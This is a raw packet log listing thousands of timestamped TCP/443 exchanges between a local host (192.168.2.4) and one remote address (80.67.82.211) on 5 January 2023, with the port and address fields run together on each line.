                                                                                                                                                                                    Jan 5, 2023 08:58:10.999993086 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000027895 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000029087 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000036955 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000050068 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000050068 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000057936 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000081062 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000114918 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000118017 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000122070 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000133038 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000133991 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000202894 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000205994 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000211000 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000226974 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000235081 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000263929 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000273943 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000276089 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000277042 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000286102 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000293016 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000294924 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000334978 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000349045 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000385046 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000411034 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000420094 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000437975 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000448942 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000452042 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000452042 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000479937 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000502110 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000521898 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000536919 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000536919 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000539064 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000547886 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000555992 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000572920 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000613928 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000626087 CET4434973280.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000633955 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000674963 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000678062 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000678062 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000678062 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000691891 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000694036 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000699997 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000706911 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000706911 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000719070 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000744104 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000770092 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000798941 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000798941 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000808954 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000833035 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000840902 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000854969 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000866890 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000910997 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.000935078 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001013041 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001055002 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001101017 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001110077 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001142979 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001147032 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001166105 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001176119 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001200914 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001202106 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001244068 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001252890 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001272917 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001292944 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001312971 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001368046 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001445055 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001482010 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001523018 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001534939 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001562119 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001570940 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001581907 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001605034 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001645088 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001647949 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001674891 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001684904 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001732111 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001732111 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001739979 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001764059 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001800060 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.001825094 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002405882 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002449989 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002490044 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002506971 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002537966 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002556086 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002840996 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002887011 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002913952 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002924919 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002952099 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.002968073 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003252983 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003304958 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003339052 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003365040 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003390074 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003474951 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003611088 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003689051 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.003983021 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004024982 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004065037 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004077911 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004098892 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004122019 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004264116 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004311085 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004347086 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004371881 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004395008 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004493952 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004496098 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004539967 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004573107 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004590034 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004633904 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004633904 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004722118 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004787922 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004857063 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.004949093 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005322933 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005326986 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005361080 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005371094 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005409956 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005424023 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005475044 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005498886 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005507946 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005507946 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.005633116 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.006212950 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.006247997 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.006299973 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.006311893 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.006349087 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.006433010 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008025885 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008070946 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008121014 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008141041 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008162975 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008177996 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008532047 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.008764029 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009202003 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009238005 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009283066 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009299994 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009313107 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009412050 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009655952 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.009738922 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010256052 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010302067 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010325909 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010335922 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010366917 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010384083 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010472059 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010541916 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010919094 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.010962963 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011008978 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011033058 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011049032 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011442900 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011482000 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011524916 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011533022 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011537075 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011559963 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011652946 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011698008 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011714935 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011724949 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011766911 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011878014 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011921883 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011960030 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.011982918 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012001038 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012001038 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012026072 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012089968 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012103081 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012741089 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012790918 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012830019 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012852907 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012867928 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012878895 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012878895 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.012944937 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013442993 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013483047 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013510942 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013535976 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013547897 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013562918 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.013588905 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014080048 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014131069 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014178038 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014194965 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014213085 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014238119 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014249086 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014271975 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014316082 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014413118 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014511108 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014568090 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014579058 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014592886 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014638901 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014657974 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014659882 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014729977 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.014744997 CET4434973380.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015182972 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015232086 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015269041 CET49733443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015275002 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015296936 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015314102 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015484095 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015538931 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015600920 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015616894 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015635014 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.015671968 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.016206026 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.016289949 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018151045 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018203020 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018256903 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018271923 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018304110 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018338919 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018438101 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018486023 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018515110 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018529892 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018548965 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.018573046 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019218922 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019310951 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019448042 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019495010 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019531965 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019550085 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019566059 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019695997 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019795895 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019798040 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019830942 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019845963 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019862890 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.019885063 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020663023 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020713091 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020761967 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020785093 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020803928 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020925045 CET49735443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:11.020957947 CET4434973580.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:11.021033049 CET49735443192.168.2.480.67.82.211
